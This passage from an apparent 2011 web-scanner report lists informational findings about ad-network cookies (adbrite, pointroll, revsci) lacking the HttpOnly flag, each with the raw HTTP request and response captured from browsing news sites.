xt,H!$*bX!!!!#<xr]Q!$*hf!!!!$<yjL@"; path=/; expires=Wed, 08-May-2013 13:59:17 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 09 May 2011 13:59:17 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

10.15. http://ads.adbrite.com/adserver/vdi/742697

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: srh, rb2, ut, vsd and fq (fq is being cleared: its expiry equals the response Date header, so the missing flag on it is immaterial). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; 
fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=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; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.16. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: PRvt, PRgo, PRimp, PRca, PRcp, PRpl, PRcr and PRpc. Note that the server emits these headers with no space after Set-Cookie: and with a trailing ;; on each line; browsers parse them anyway, but a strict header parser may not. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

10.17. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000 and rsiPus_xqR7 (cleared, once for Path=/adserver and once for Path=/), then rsiPus_TX2x and rsi_us_1000000 (re-issued with Max-Age=1009152000, about 32 years). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-715901-1023315-725071-1268392-1198035-1049794-1238051-74560-593881-1264419-86237-926097-1006089-1196051-1147048-1086731-1284585-1086733-1044410-1093100-1063912-397181-1044578-1063916-1041270-1049769-1049770-596293-576685-1044587-596291-1049772-1063911-1063910 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=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; udm_0=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; rsiPus_xqR7="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"; rsi_us_1000000="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"; rsi_segs_1000000=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_xqR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TX2x="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 13:59:44 GMT

GIF89a.............!.......,...........D..;

10.18. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000 and rsiPus_wuF1 (cleared, once for Path=/adserver and once for Path=/), then rsiPus_dJdc and rsi_us_1000000 (re-issued with Max-Age=1009152000, about 32 years). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wuF1=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dJdc="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeov8FSjRptD7ENTZzS+tm+o7g1+4q2ipO6FebBr4lX9JqakD06xSknvL52fJuOnqMnmUVtbZDezFLZDkQ9/DOcJVmus0zFa8R4eGBZWoP51vdnmVwXUWy2AzzrS3LC/KeUSBZa17NuW8wA7lJfNqWQdNV06Z479d+6FpyKgl1Hq2XjxlJ1jOqjAs1WA1dOdiAIQwLbq3YvJx3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL1wdlfCMgFvoSIbnMIU57JYoUftImTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nELrmFh+jD84pvE1zt38WPal3ooNbYubn6Gn6tNGszfofAmyosRDfqsN6xGEQBrpVuB7EfC1mMrWQQm07FAtrYhxV9jQPwF8aAzKS57OagwgoEgSWJac4EL43S44ef75AQMhog8R/Pbu0AqaCZyqSzfFJo37W/WnSakK60MhraaUHbB845TFfFuKnF6d1KnlacwSiwYA4zSViHcP6ulEzTa2oAJJBpaf86mV/36OOxQ0C06BBrl3U3FaMUccpgDS4Q6g85h8LjjPuJ5HD9lRQdGnciFJst2iIODuspDiNNQn53F37Ivg6K3BHkEYUvP8DjelaXuskVdPwcX2N1TfClGnCAS6cYQQECmKkEoV2Ty5ma1uCIeUwK/N0b9Nw80EpBMjmz2PF81rbW1LZR8Yrr50OIbx0E38b3QIYtaiQ2HH5TaVYZ38N5Be6eCj5Q7QpcoPj5ERI0sgXD6QKCSwduWmd0RV+fSV2TkbCTv+pnupeZ/EjnilqyR2yvHw6RMR0Bq3qEoPosr7iZUc//XDs7ZXY9WWcbNbUCrAvKfBaQrg0Vc6Qi97aI3G1N/kNvNpKTN/23K8u93rljutE4/CsbGAj8f7WMmbTOIMjkFV+rmcEcrgDHUZj8EV4wcvuoVrfNQkocxZzCkctye0KoRoJIKX5KRQqqUzeq06HfHZGcVhuvF3BKdMM/Fjmsszs9H6zArVaijt0fVauRh7dBVBdULPsaJ7riVOn6Uwy3fpnD9ux5E9H7qsEK1h7fbJO18nv26wKJ7YWZM5gXP2LEWHxvabbxbwwGJ1QlIMhDB0OoWtqmjDKiV9MuMnamXFEGet8G/CDst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP9qYhrYyEalVKutJsu2eWT6Je8BzKdDq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjXk4TjthW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZAPZFpFvij+HpKJotZx5w6ko9LWWaFIAAC2R/IHJ1W5UMBBCdaqSbYc7M/Frlfg0k+l6JH8QfxsE/FY8E"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:42 GMT
Content-Length: 1315

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.19. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: rsi_us_1000000 and rsiPus_--QM (cleared, once for Path=/adserver and once for Path=/), then rsiPus_7Gnt and rsi_us_1000000 (re-issued with Max-Age=1009152000, about 32 years). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I10982 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; 
